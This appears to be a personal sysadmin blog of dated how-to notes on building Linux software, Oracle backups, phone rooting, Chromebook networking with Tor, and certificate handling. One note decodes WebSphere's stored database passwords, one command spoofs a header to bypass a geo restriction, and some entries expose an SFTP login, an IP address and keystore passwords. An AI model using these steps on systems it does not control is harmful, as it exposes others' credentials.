1 2	modman init modman clone https://github.com/colinmollenhour/Cm_Cache_Backend_Redis

lib Credis && Cm_Cache_Backend_Redis are already installed, just copy these files to respective directory
run php stats.php to show the usage of tags in redis

Install tmux

yum install glibc-static
install ncurse : ./configure && make && sudo make install

install tmux :

./configure --enable-static CFLAGS="-I/usr/local/include -I/usr/local/include/ncurses" LDFLAGS="-L/usr/local/lib -L/usr/local/include -L/usr/local/include/ncurses" LIBEVENT_CFLAGS="-I/usr/local/include" LIBEVENT_LIBS="-L/usr/local/lib -levent"

Reference: http://pyther.net/2014/03/building-tmux-1-9a-statically/

Install ranger
- yum install ncurses-devel
- cd Python-2.7.3 && ./configure && make && sudo make
- wget http://nongnu.org/ranger/ranger-stable.tar.gz
- cd ranger-1.7.1/ && python setup.py install

2015-08-31

2015-08-31

Install transmission-daemon on CentOS

Fail to install rTorrent on CentOS 5.4, just install transmission-daemon

libevent

wget --no-check-certificate https://sourceforge.net/projects/levent/files/libevent/libevent-2.0/libevent-2.0.22-stable.tar.gz
tar xzf libevent-2.0.22-stable.tar.gz
cd libevent-2.0.22-stable
make && sudo make install

curl

wget http://curl.haxx.se/download/curl-7.44.0.tar.gz
tar zxf curl-7.44.0.tar.gz
cd curl-7.44.0
make && sudo make install

transmission

wget http://download.transmissionbt.com/files/transmission-2.84.tar.xz
yum install -y xz
unxz transmission-2.84.tar.xz
cd transmission-2.84
export PKG_CONFIG_PATH=/usr/local/lib/pkgconfig
export LIBS="-pthread -lm -lz -ldl -lutil"
export LIBCURL_LIBS="-I/usr/local/lib -lcurl"
export LIBEVENT_LIBS="-I/usr/local/lib -levent"
make && sudo make install

check config at $HOME/.config/transmission-daemon

1
2
3

transmission-remote --add xxx.torrent # add seed
transmission-remote -st # check status
transmission-remote -l # list

2015-08-27

2015-08-27

Install ffmpeg on CentOS (RHEL/Fedora)

1 2	mkdir ffmpeg_sources cd ffmpeg_sources/

yasm

wget http://www.tortall.net/projects/yasm/releases/yasm-1.2.0.tar.gz
tar zxvf yasm-1.2.0.tar.gz
# ./configure
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build
#make && sudo make install
make && make install

x264

sudo echo "/opt/software/ffmpeg_sources/ffmpeg_build/lib" > /etc/ld.so.conf.d/ffmpeg.conf
sudo ldconfig
export PATH=$PATH:/opt/software/ffmpeg_sources/ffmpeg_build/bin

#git clone git://git.videolan.org/x264.git (old)
git clone https://git.videolan.org/git/x264.git
cd x264
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --enable-static
make && make install

lame

curl -L -O http://downloads.sourceforge.net/project/lame/lame/3.99/lame-3.99.5.tar.gz
tar zxf lame-3.99.5.tar.gz
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --enable-nasm
make && sudo make install

ogg

wget http://downloads.xiph.org/releases/ogg/libogg-1.3.0.tar.gz
tar zxvf libogg-1.3.0.tar.gz
cd libogg-1.3.0
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build
make && make install

libvorbis

curl -O http://downloads.xiph.org/releases/vorbis/libvorbis-1.3.4.tar.gz
tar zxvf libvorbis-1.3.4.tar.gz
export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/opt/software/ffmpeg_sources/ffmpeg_build/lib/pkgconfig
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --with-ogg
make && make install

libvpx

git clone https://github.com/webmproject/libvpx.git #(need to set core.gitProxy)
cd libvpx/
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build 
make && sudo make install

#sudo echo /usr/local/lib > /etc/ld.so.conf.d/local-libs.conf
sudo ldconfig

xvidcore

wget http://downloads.xvid.org/downloads/xvidcore-1.3.2.tar.gz
tar zxf xvidcore-1.3.2.tar.gz
cd xvidcore/build/generic
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build
make && make install

ffmpeg

#git clone git://git.videolan.org/ffmpeg.git (old)
git clone https://git.videolan.org/git/ffmpeg.git
cd ffmpeg
./configure --prefix=/opt/software/ffmpeg_sources/ffmpeg_build --enable-libmp3lame --enable-gpl --enable-libx264 --enable-libxvid --enable-postproc --enable-nonfree --enable-libvpx --enable-libvorbis --extra-cflags=-I/opt/software/ffmpeg_sources/ffmpeg_build/include --extra-ldflags=-L/opt/software/ffmpeg_sources/ffmpeg_build/lib ## no faac --enable-libfaac
make && make install

ffmpeg -headers "X-Forwarded-For: 160.53.186.194" -i http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20150824.mp3/playlist.m3u8 -c copy City_Snapshot-20150824-.mp3

the option “headers” must be put here for download this m3u8

Reference
https://trac.ffmpeg.org/wiki/CompilationGuide/Centos
http://injustfiveminutes.com/2013/07/17/how-to-compile-latest-version-of-ffmpeg-on-centos-5/

2015-07-30

2015-07-30

Auto login in koding.com using selenium

package xx;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.List;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.remote.DesiredCapabilities;
import org.openqa.selenium.remote.RemoteWebDriver;
import org.openqa.selenium.support.ui.WebDriverWait;

import com.google.common.base.Function;

public class Selenium2Example {
	public static void main(String[] args) throws MalformedURLException {
		// Create a new instance of the Chrome driver
		// Notice that the remainder of the code relies on the interface, 
		// not the implementation.
		System.setProperty("webdriver.chrome.driver",
				"C:\\Users\\User\\#Downloads\\chromedriver_win32\\chromedriver.exe");
		ChromeDriver driver = new ChromeDriver();

		//WebDriver driver = new RemoteWebDriver(new URL("http://127.0.0.1:9515"), DesiredCapabilities.chrome());

		// And now use this to visit Google
		driver.get("https://koding.com/Login");
		// Alternatively the same thing can be done like this
		// driver.navigate().to("http://www.google.com");

		// Find the text input element by its name
		WebElement element = driver.findElement(By.name("username"));

		// Enter something to search for
		CharSequence[] ch = new CharSequence[] { "xxx" };
		element.sendKeys(ch);

		WebElement element2 = driver.findElement(By.name("password"));
		element2.sendKeys(new CharSequence[] { "vvv" });

		// Now submit the form. WebDriver will find the form for us from the element
		element.submit();

		// Check the title of the page
		System.out.println("Page title is: " + driver.getTitle());

		try {
			WebElement button = (new WebDriverWait(driver, 20)).until(new Function<WebDriver, WebElement>() {
				public WebElement apply(WebDriver driver) {
					List<WebElement> els = driver.findElements(By.id("kd-376"));
					if (!els.isEmpty()) {
						return els.get(0);
					}
					return null;
				}
			});

			if (button != null) {
				button.click();
				new WebDriverWait(driver, 10);
			}
		} catch (Exception e) {
			e.printStackTrace();
		}

		System.out.println("Page title is: " + driver.getTitle());

		//Close the browser
		driver.quit();
	}
}

2015-06-04

2015-06-04

Root lenovo A916 and Sony Xperia T2 Ultra

Root lenovo A916 and Sony Xperia T2 Ultra.
Download adb and fastboot1.

In windows, download Android ADB Fastboot 1.3.msi

In Ubuntu, apt-get install android-tools-adb android-tools-fastboot unlock bootloader, flash cwm-recovery and root phone

adb reboot-bootloader
fastboot devices
fastboot oem unlock
fastboot reboot
fastboot flash recovery cwm-recovery.img
fastboot reboot
adb push UPDATE-SuperSU-v2.46.zip /sdcard/
Install SuperSU zip according by ClockworkMod menu

Extra: check information

A916 -> adb reboot recovery -> check internel version, found version: A916_S205_141013, call *#*#5448264#*#* to enable dual sim dual standby
D5303 -> call *#*#7378423#*#* to check service information

Reference:
Dual Sim card dual standby http://ask.lenovomobile.com/index.php?question/view/598417.html
https://forums.lenovo.com/t5/A-and-P-Series/Lenovo-phone-a916-A916-S1205-141013/td-p/2049911
http://pdadb.net/index.php?m=specs&id=6663&c=lenovo_a916_dual_sim_td-lte

Download A916 offical ROM and CWM Recovery http://ask.lenovomobile.com/?q-594219.html

Dual SIM Dual Standby Official ROM http://blog.cellphonemic.com/?p=624
Recovery http://blog.cellphonemic.com/?p=694
One Key Root http://blog.cellphonemic.com/?p=627

unlock bootloader of T2 Ultra http://developer.sonymobile.com/unlockbootloader/

HTC/华为/酷派手机官方解锁教程 http://bbs.360safe.com/thread-4954939-1-1.html

All in this post (VERY USEFUL) [GUIDE] OnePlus One - How to Unlock Bootloader, Install Custom Recovery and Root

【攻略】Android 進階開發教學：讓你一次補足所有知識！

lifehacker
The Most Useful Things You Can Do with ADB and Fastboot on Android
How to Flash a ROM to Your Android Phone

WIKI Of CM and CWM recovery http://wiki.cyanogenmod.org/w/Doc:_fastboot_intro
(fix the issue of “wait for the device”)
http://wiki.cyanogenmod.org/w/All_About_Recovery_Images
http://wiki.cyanogenmod.org/w/ClockWorkMod_Instructions

Unlock bootloader and install recovery
How to root Lenovo A916 phablet in less than an hour
Download CWM & TWRP Recovery for Lenovo A916
用臨時Recovery root機
 [HowTo] Unlocking the Bootloader (Windows)

Reference:
木子软件 http://www.muzisoft.com/recovery/ http://www.muzisoft.com/root/
刷机网 http://www.shuaji.net/
线刷宝 - 华为fastboot机型解锁教程 http://www.xianshuabao.com/skill/285.html

Root Sony WT19i
http://forum.xda-developers.com/showthread.php?t=1559685
http://forum.xda-developers.com/showthread.php?t=1865037
http://www.android.gs/root-sony-xperia-live-walkman-wt19i/

2015-05-14

2015-05-14

Backup / Restore Oracle DB

Backup Oracle DB in NOARCHIVELOG mode.In sqlplus console,

$ sqlplus / as sysdba (sqlplus /nolog then conn /as sysdba)
SQL> archive log list;
SQL> show parameter DB_RECOVERY_FILE_DEST;
SQL> alter system set db_recovery_file_dest='/flash_recovery_area' scope=both;
SQL> shutdown immediate;
SQL> startup mount;
 // at this time, run RMAN> backup database;
 // OR change archive log mode
SQL> alter database archivelog;
SQL> alter database open;
SQL> archive log list;
SQL> alter system switch logfile; ( OR alter system archive log current)
SQL> select operation, status, mbytes_processed, start_time, end_time from v$rman_status order by start_time;

If archivelog mode is enabled

RMAN> backup incremental level 0 database plus archivelog delete input;
OR
RMAN> backup as compressed backupset incremental level 0 database include current controlfile plus archivelog;
OR
RMAN> backup as compressed backupset incremental level 0 database include current controlfile plus archivelog delete all input;
ADN
RMAN> backup incremental level 1 database plus archivelog delete input;

In rman prompt,

$ rman
RMAN> connect target /;
RMAN> list backup;
RMAN> list backup summary;
RMAN> backup as compressed backupset tag 'weeekly_prd01_tbls_bk_only' tablespace prd01;
RMAN> backup as compressed backupset database plus archivelog ;

RMAN> run {  # backup directly in noarchive mode
shutdown immediate;
startup mount;
backup database;
alter database open;
}

RMAN> show all;
CONFIGURE RETENTION POLICY TO REDUNDANCY 1;
CONFIGURE BACKUP OPTIMIZATION ON;
CONFIGURE DEFAULT DEVICE TYPE TO DISK;
CONFIGURE CONTROLFILE AUTOBACKUP ON;
CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '/tmp/backup/%F';
CONFIGURE DEVICE TYPE DISK PARALLELISM 1 BACKUP TYPE TO BACKUPSET;
CONFIGURE DATAFILE BACKUP COPIES FOR DEVICE TYPE DISK TO 1;
CONFIGURE ARCHIVELOG BACKUP COPIES FOR DEVICE TYPE DISK TO 1;
CONFIGURE CHANNEL DEVICE TYPE DISK FORMAT   '/tmp/backup/dbkup_%Y%M%D_%U';
CONFIGURE MAXSETSIZE TO UNLIMITED;
CONFIGURE ENCRYPTION FOR DATABASE OFF;
CONFIGURE ENCRYPTION ALGORITHM 'AES128';
CONFIGURE COMPRESSION ALGORITHM 'BASIC' AS OF RELEASE 'DEFAULT' OPTIMIZE FOR LOAD TRUE;
CONFIGURE ARCHIVELOG DELETION POLICY TO NONE;
CONFIGURE SNAPSHOT CONTROLFILE NAME TO '/u01/app/oracle/product/11.2.0/dbhome_1/dbs/snapcf_CHHDEV2.f';

Full version of backup

#!/usr/bin/ksh

DATABASE=CHHDEV2

RUNTIME=`date '+%H%M_%d%m%Y'`

BACKUPDIR=/tmp/backup

LOGFILE=${BACKUPDIR}/${ORACLE_SID}_${RUNTIME}.log

LEVEL=0

exec >> ${LOGFILE} 2>&1

$ORACLE_HOME/bin/rman msgno target / nocatalog <<EOF!

CONFIGURE RETENTION POLICY TO REDUNDANCY 3; # default 1

# CONFIGURE RETENTION POLICY TO RECOVERY WINDOW OF 14 DAYS; # default 1

CONFIGURE BACKUP OPTIMIZATION ON; # default OFF

CONFIGURE DEFAULT DEVICE TYPE TO DISK; # default

CONFIGURE CONTROLFILE AUTOBACKUP ON; # default OFF

CONFIGURE CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '${BACKUPDIR}/ora_cf%F'; # default '%F'

CONFIGURE DEVICE TYPE DISK PARALLELISM 3; # default 1

CONFIGURE DATAFILE BACKUP COPIES FOR DEVICE TYPE DISK TO 1; # default

CONFIGURE ARCHIVELOG BACKUP COPIES FOR DEVICE TYPE DISK TO 1; # default

CONFIGURE CHANNEL DEVICE TYPE DISK FORMAT '${BACKUPDIR}/ora_df%t_s%s_s%p';

CONFIGURE MAXSETSIZE TO UNLIMITED; # default

CONFIGURE SNAPSHOT CONTROLFILE NAME TO '${BACKUPDIR}/snapcf_${DATABASE}.f';

SHOW ALL;

sql "alter system switch logfile";

CROSSCHECK ARCHIVELOG ALL;

# BACKUP AS COMPRESSED BACKUPSET INCREMENTAL LEVEL 0 DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG DELETE ALL INPUT;

# BACKUP AS COMPRESSED BACKUPSET DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG DELETE ALL INPUT;

# BACKUP DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG DELETE ALL INPUT;

# backup AS COMPRESSED BACKUPSET database include current controlfile format '${BACKUPDIR}/ora_df%t_s%s_s%p';

# backup AS COMPRESSED BACKUPSET archivelog UNTIL TIME '(SYSDATE - 1)' not backed up 1 times  format '${BACKUPDIR}/ora_arc%t_s%s_s%p';

# delete noprompt archivelog until time '(SYSDATE -1)' backed up 1 times to device type disk;

BACKUP AS COMPRESSED BACKUPSET INCREMENTAL LEVEL ${LEVEL} DATABASE INCLUDE CURRENT CONTROLFILE PLUS ARCHIVELOG;

DELETE NOPROMPT COPY OF ARCHIVELOG ALL COMPLETED BEFORE 'SYSDATE-5';

sql "alter database backup controlfile to trace as ''${BACKUPDIR}/ctrlfile_${DATABASE}_${RUNTIME}''";

allocate channel for maintenance type disk;

delete noprompt obsolete device type disk;

CROSSCHECK BACKUP;

CROSSCHECK ARCHIVELOG ALL;

REPORT OBSOLETE;

DELETE FORCE NOPROMPT OBSOLETE;

DELETE FORCE NOPROMPT expired backup of archivelog all;

DELETE FORCE NOPROMPT expired backup;

LIST BACKUP OF DATABASE;

LIST BACKUP OF ARCHIVELOG ALL;

LIST BACKUP;

release channel;

EXIT

EOF!

exit

Store Oracle DB

RMAN> SET DBID 70161972;
RMAN> RUN {
    startup force nomount;
    SET CONTROLFILE AUTOBACKUP FORMAT FOR DEVICE TYPE DISK TO '/tmp/backup/%F';
    RESTORE CONTROLFILE to '/tmp/controlfile' FROM AUTOBACKUP;
    RESTORE SPFILE to pfile '/tmp/pfile' FROM AUTOBACKUP;
    //OR
    restore controlfile from autobackup;
    restore spfile from autobackup;

    SET ARCHIVELOG DESTINATION TO '/tmp/temp_restore';
    RESTORE ARCHIVELOG ALL;

    startup mount;
    restore database;
    recover database;
    sql 'alter database open RESETLOGS';
    }

Reference:
https://support.software.dell.com/netvault-backup/kb/140173
http://dbaworkshop.blogspot.hk/2012/07/how-to-backup-database-in-noarchivelog_31.html
http://ss64.com/ora/rman_backup.html
http://www.dba-oracle.com/t_rman_incremental_backups.htm
http://www.dba-oracle.com/concepts/rman_recovery_database_spfile.htm
http://www.dba-oracle.com/concepts/rman.htm
http://www.dba-oracle.com/concepts/rman_online_offline_backups.htm
http://www.dba-village.com/village/dvp_forum.OpenThread?ThreadIdA=44077&DestinationA=RSS
http://docs.oracle.com/cd/E11882_01/backup.112/e10642/rcmadvre.htm
http://docs.oracle.com/cd/B19306_01/backup.102/b14192/recov004.htm#i1032364

2015-05-11

2015-05-11

Decode/Encode websphere database password

Locate the file at /usr/IBM/WebSphere/AppServer/profiles/AppSrvMars01/config/cells/mars01Cell01/security.xml
Find the “authDataEntries” tag and then get the password attribute.

Open console and goto directory /usr/IBM/WebSphere/AppServer,
encode:

1	java -cp plugins/com.ibm.ws.runtime.jar:lib/bootstrap.jar:runtimes/com.ibm.jaxws.thinclient_7.0.0.jar com.ibm.ws.security.util.PasswordEncoder password

decode:

1	java -cp plugins/com.ibm.ws.runtime.jar:lib/bootstrap.jar:runtimes/com.ibm.jaxws.thinclient_7.0.0.jar com.ibm.ws.security.util.PasswordDecoder {xor}Lz4sLCgwLTs=

Reference:
http://www.sysman.nl/wasdecoder/
http://stackoverflow.com/questions/7885134/how-to-recover-admin-password-in-websphere-portal-v7
http://weblogic-wonders.com/weblogic/tag/com-ibm-ws-bootstrap-raswsloggerfactory/

2015-04-15

2015-04-15

Decrypt file with GPG and Download m3u8 file

Decrypt file with GPG

Import keys to gpg

1
2
3

gpg –import secring.skr
gpg –import pubring.pkr
gpg –list-keys

result as below,

pub 2048R/82F66E2C 2014-01-06 [expires: 2017-01-06]
Key fingerprint = 4BA1 30AA 793A 1D54 2787  F287 F87E 5CFF 82F6 6E2C
uid xxxx-999999999-20140106 sub 2048R/A1EBDC74 2014-01-06 [expires: 2017-01-06]
pub 4096R/A05189D6 2014-01-02 [expires: 2017-12-31]
Key fingerprint = 674A 9A1D 5675 ED25 802C  574C F591 50E3 A051 89D6
uid CEMailBxHKEPSC2017-12-31 sub 4096R/B47C7A5B 2014-01-02 [expires: 2017-12-31]

Run sftp -P 38024 ephp2650@203.112.90.74 to login
Download PPSCDDMMYY.pgp from server
Run gpg PPSCDDMMYY.pgp to decrypt and mv PPSCDDMMYY PPSCDDMMYY.zip and unzip PPSCDDMMYY.zip to get file MERCHANT.TXT

Download m3u8 file

Install Chrome Cache View from NirSoft

Install ffmpeg

1
2
3

sudo add-apt-repository ppa:mc3man/trusty-media
sudo apt-get update
sudo apt-get install ffmpeg gstreamer0.10-ffmpeg

find m3u8 url in Chrome Cache View
run
ffmpeg -i http://stmw.rthk.hk/aod/_definst_/radio/archive/radio1/City_Snapshot/mp3/mp3:20150413.mp3/playlist.m3u8 -c copy City_Snapshot-20150413-.mp3 to download

Reference:

GnuPG

http://www.pgpi.org/doc/pgpintro/
http://www.hanewin.net/encrypt/PGcrypt.htm
http://support.gpgtools.org/kb/gpgservices-faq/how-to-encrypt-and-sign-text-or-files-with-gpgservices
http://science.opposingviews.com/decrypt-file-using-pgp-23391.html
ftp://ftp.pgpi.org/pub/pgp/6.5/docs/english/PGPCmdLineGuide.pdf
http://askubuntu.com/questions/100281/how-do-i-make-a-pgp-key
https://help.ubuntu.com/community/GnuPrivacyGuardHowto
http://www.techrepublic.com/blog/linux-and-open-source/encrypting-and-decrypting-files-with-gnupg/
http://ubuntuforums.org/showthread.php?t=680292
http://askubuntu.com/questions/332020/how-do-i-import-a-private-key-into-gpg-so-that-it-becomes-the-default-key
https://www.madboa.com/geek/gpg-quickstart/
http://www.spywarewarrior.com/uiuc/gpg/gpg-com-4.htm

Download m3u8

http://swimminginthought.com/download-m3u8-file/

2015-03-12

2015-03-12

Things on Chromebook

I am pleased for the performance and design with my chromebook Acer C720.
I had installed crouton by following the procedure,

Enable develop mode -> esc + refresh + power button, then crtl + d.
Open crosh window by crtl + alt + t, type shell, run sudo sh -e ./crouton -t xfce the default system installed in your chroot will be ubuntu 12.04 precise. To see the usage of crouton, sh ./crouton -h or sh ./crouton -t list or sh ./crouton -r list
Do not use the argument -P which install crouton via proxy, since opengpg verification would be failed by proxy, then process will pause.
To enter into ubuntu, just type sudo enter-chroot or sudo startxfce4, switch system by crtl + alt + forward then refresh and crtl + alt + backward
Recommend to install crouton integration extension in chrome from web store in google
Update ubuntu, sudo sh ./crouton -u -t xiwi,extension,keyboard, target xiwi should be placed at first, then sudo startxfce4 -b, ubuntu will run in a chrome tab, that is amazing. An issue encounterred when install xiwi is missing the dependency xserver-xorg-core, sudo enter-chroot then sudo apt-get install xserver-xorg-core
Some things to do after installing ubuntu, such as sudo apt-get purge xcreensaver, install leafpad, VLC etc.

I would like to leverage usb tethering insteads of wifi tethering from my phone. At beginning, I had tried easytether wihch works perfectly with my dual systems, but the lite version only support http, not include https. I have to find another way to surf internet using usb tethering.

To run easytether, install easytether lite from google play, in ubuntu, run sudo apt-get install libusb-1.0.0 and sudo dpkg -i easytether_0.7.4-1_i386.deb, it will install the easytether package in your system, type easytether connect, allow the connection in your phone, a new net interface will appear by ip addr

Another way to usb tethering, install adb in ubuntu, socks proxy way to surf intenet. Add ppa repository as below,

sudo apt-get install software-properties-common
sudo apt-get install python-software-properties # to add apt-add-repository utility
sudo add-apt-repository ppa:nilarimogard/webupd8
sudo apt-get update
sudo apt-get install android-tools-adb
sudo apt-get install android-tools-fastboot
sudo apt-get install usbutils # to add lsusb command

Install tools to create a virtual interface to let chromeos can connet to an Ethenent
sudo apt-get install bridge-utils uml-utilities iptables
bridge-utils for brctl
uml-utilities for tunctl
Add following rule in file /etc/udev/rules.d/99-android.rules
SUBSYSTEM=="usb", ATTR{idVendor}=="0fce", ATTR{idProduct}=="61a9", MODE="0666", GROUP="plugdev"
sudo service udev restart
Plug my phone to chromebook, type lsusb, my phone can be recognized as Bus 001 Device 005: ID 0fce:61a9 Sony Ericsson Mobile Communications AB.
Follow these steps to connect internet with usb tethering
run below script
adb forward tcp:41927 tcp:41927
adb forward --list
At mobile, run AzLink, at ubuntu run openvpn azilink.ovpn

Add bridge interface by

brctl addbr br0
ifconfig br0 192.168.56.3 netmask 255.255.255.0 up
iptables -I FORWARD -i tun0 -o br0 -j ACCEPT
iptables -I FORWARD -i br0 -o tun0 -j ACCEPT
iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
echo “nameserver 8.8.8.8 8.8.4.4” > /etc/resolv.conf

At this time, ubuntu can already connect to internet, but chromeos cannot. You need to setup internet connection at Setting Pannel, you just confirm the setting, nothing need to input, then you will see “Conneted to Ethernet”, chromeos now can surf internet.
If you find the “The Web page is not available” message suddenly, you may re-configure the file /etc/resolv.conf with nameserver 8.8.8.8 8.8.4.4 or nameserver 192.168.56.1
Chinese display
Check locales /usr/share/i18n/SUPPORTED, /usr/share/locale, /usr/lib/locale
Add zh_CN.UTF-8 in /var/lib/locales/supported.d/local
- re-gen locale : sudo locale-gen sudo dpkg-reconfigure locales
- Add environment: add zh_CN.UTF-8 in /etc/environment
- change default language, just export LANG=en_US.UTF-8 or zh_CN.UTF-8
- Install zh_TW and zh_HK by sudo apt-get install language-support-fonts-zh-hant
- Install chinese fonts by sudo apt-get install xfonts-wqy
- Refer to http://www.davidpai.tw/ubuntu/2011/ubuntu-set-locale/

Fix issue of no sound in crouton
Test sound $ sudo enter-chroot aplay /usr/share/sounds/alsa/Front_Center.wav
Re-install pulseaudio and alsa-base

1
2
3

sudo apt-get install mplayer smplayer ubuntu-restricted-extras
sudo apt-get remove --purge pulseaudio alsa-base
sudo apt-get install pulseaudio alsa-base

Install latest version of git and golang

add-apt-repository ppa:git-core/ppa

sudo add-apt-repository ppa:bcandrea/backports
sudo apt-get update
sudo apt-get install git
sudo apt-get install golang
sudo go get github.com/djimenez/iconv-go // Install chinese encoding package

Connect to RPi with adafruit serial cable sudo screen /dev/ttyUSB0 115200
Install Android Runtime for Chrome and ARC Welder to launch Android app to play with .
Tor on ChromeOS
Install apps of Orbot and Proxy Server on android mobile
Start Orbot, setup port forward on Proxy Server 127.0.0.1:8080 -> 127.0.0.1:8118 (Orbot service)
In crosh, type adb forward tcp:8080 tcp:8080
Ensure ChromeOS has a IP (assigned by wifi or bridged), configure the proxy as 127.0.0.1:8080
Now it is time to access following urls,
http://check.torproject.org/
https://duckduckgo.com/
https://www.tor2web.org/ http://thehiddenwiki.org/

Install tor-browser (it is firefox based) in ubuntu

sudo vi /etc/apt/apt.conf.d/10proxy (Acquire::http::Proxy "http://192.168.137.1:21/";)
export http://192.168.137.1:21/
export http_proxy=http://192.168.137.1:21/
export https_proxy=http://192.168.137.1:21/
sudo -E add-apt-repository ppa:webupd8team/tor-browser
sudo apt-get update
sudo apt-get install tor-browser

If you do not want to surf internet with Tor, just stop Orbot and Proxy Server, start Proxoid

Reference:

http://www.omgchrome.com/an-introduction-to-tor-on-chrome-os/
https://docs.google.com/document/d/1I1lBG1P2GOf3ooNhX-5pyrVF6RnxmpuEw62pi17Tb0I/edit
http://www.ubertechblog.com/2011/07/beginners-guide-to-deep-web-or-darknet.html

Fix issue of “read from TUN/TAP : File descriptor in bad state (code=77)” when run `openvpn azilink.ovpn` after upgrading chromeos

Run the following command in your shell on ChromeOS (the shell, not crosh)

1 2	sudo stop shill sudo start shill BLACKLISTED_DEVICES=tun0

2015-01-15

2015-01-15

when-to-use-rebuild-vs-coalesce-vs-shrink

Find out the table size

SELECT owner, segment_name, segment_type, partition_name, ROUND(bytes/(1024*1024),2) SIZE_MB, tablespace_name
FROM DBA_SEGMENTS
WHERE SEGMENT_TYPE IN ('TABLE', 'TABLE PARTITION', 'TABLE SUBPARTITION',
'INDEX', 'INDEX PARTITION', 'INDEX SUBPARTITION', 'TEMPORARY', 'LOBINDEX', 'LOBSEGMENT', 'LOB PARTITION')
--AND TABLESPACE_NAME LIKE 'COSTE%'
--AND SEGMENT_NAME LIKE 'P2010201%'
--AND partition_name LIKE 'P20100201%'
--AND segment_type = 'TABLE'
--AND OWNER = 'TARGET_POC'
--AND ROUND(bytes/(1024*1024),2) > 1000
ORDER BY bytes DESC;

You can group by tablespace, owner and segment type and see the total space occupied in MBytes

SELECT tablespace_name, owner, segment_type "Object Type",
   COUNT(owner) "Number of Objects",
   ROUND(SUM(bytes) / 1024 / 1024, 2) "Total Size in MB"
FROM   sys.dba_segments
WHERE  tablespace_name IN ('MPIS')
GROUP BY tablespace_name, owner, segment_type
ORDER BY tablespace_name, owner, segment_type;

find out the usage of tablespace

select df.tablespace_name "Tablespace",
totalusedspace "Used MB",
(df.totalspace - tu.totalusedspace) "Free MB",
df.totalspace "Total MB",
round(100 * ( (df.totalspace - tu.totalusedspace)/ df.totalspace))
"Pct. Free"
from
(select tablespace_name,
round(sum(bytes) / 1048576) TotalSpace
from dba_data_files
group by tablespace_name) df,
(select round(sum(bytes)/(1024*1024)) totalusedspace, tablespace_name
from dba_segments
group by tablespace_name) tu
where df.tablespace_name = tu.tablespace_name order by "Pct. Free";

Shrink table

1 2	alter table STATS$SQL_SUMMARY enable row movement; alter table STATS$SQL_SUMMARY shrink space;

Shrink index

alter index STATS$SQL_SUMMARY_PK shrink space compact
alter index STATS$SQL_SUMMARY_PK shrink space;
alter index STATS$SYSSTAT_PK coalesce
alter index STATS$SQL_SUMMARY_PK rebuild
shrink space compact = coalesce

Reference
when-to-use-rebuild-vs-coalesce-vs-shrink-space
深入理解重建索引
 Alter index coalesce VS shrink space
alter index coalesce和alter index rebuild的区别

2014-12-18

2014-12-18

Learn certificate revocation list

jks -> p12 p12 -> pem (cer) pem (cer) -> der

Convert a DER crl to PEM openssl crl -CAfile root.pem eCertCA1-10CRL2.pem
java keytool keytool -trustcacerts -import -alias alias -keystore cacerts.jks -file prod.der keytool -v -importkeystore -srckeystore cacerts3.jks -srcalias alias -destkeystore temp.p12 -deststoretype PKCS12 -srcstorepass password -deststorepass 1304478222600604 keytool -list -v -keystore xxp12 -storepass 112233 -storetype pkcs12
export private key openssl pkcs12 -in prod.cer -out csr_private.key -nocerts -nodes -password pass:1304478222600604
print basic information in p12 openssl pkcs12 -in xx.p12 -clcerts -nokeys|openssl x509 -text -noout
print information in PEM format certificate openssl x509 -in certificate.crt -text -noout

Export DER and PEM encoded certificate By java

for(String alias : keyStore.aliases()){
  if (keyStore.isKeyEntry(alias)) {
    certificate = ((X509Certificate) keyStore.getCertificate(alias);
  }
}

byte[] cert_der_format = certificate.getEncoded(); // DER Encoded String cert_pem_format = X509Factory.BEGIN_CERT + new String(BASE64EnCoder.encode(cert_der_format)) + “\n” + X509Factory.END_CERT; // PEM Encoded

By Keytool

1
2

keytool -exportcert -alias herong_key -keypass keypass -keystore herong.jks -storepass jkspass -file keytool_crt.der
keytool -exportcert -alias herong_key -keypass keypass -keystore herong.jks -storepass jkspass -rfc -file keytool_crt.pem

Methods for getting certificate information
By keytool

1 2	keytool -list -v -keystore abc.p12 -storepass 1234 -storetype pkcs12 keytool -printcert -file keytool_crt.pem

By openssl

1 2	openssl x509 -in keytool_crt.pem -text -noout` openssl x509 -in keytool_crt.der -inform der -text -noout

Convert p12 file from cert.p12 to cert2.p12

1 2	openssl pkcs12 -clcerts -nokeys -in cert.p12 -out usercert.pem // public key openssl pkcs12 -nocerts -in cert.p12 -out userkey.pem // private key

Merge it
openssl pkcs12 -export -out cert2.p12 -inkey ./userkey.pem -in ./usercert.pem

java ValidateCertUseCRL
DER vs. CRT vs. CER vs. PEM Certificates and How To Convert Them
DER (Distinguished Encoding Rules) certificate encoding
Verify Certificate is revoked by CRL
Using openssl to extract private key
SSL Converter
article-most-common-openssl-commands
normalize your certificate
Certificates: File Format & Conversion
keytool Exporting Certificates in DER and PEM
OpenSSL Validating Certificate Path
“keytool” Viewing Certificates in DER and PEM

No way to get CRL path using api from ibm jar, just find keyword CRLDistributionPoints by toString getExtension(new ObjectIdentifier(key)) as below;

package xx;

import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.KeyStore;
import java.security.KeyStoreException;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.PrivateKey;
import java.security.PrivilegedActionException;
import java.security.Signature;
import java.security.UnrecoverableKeyException;
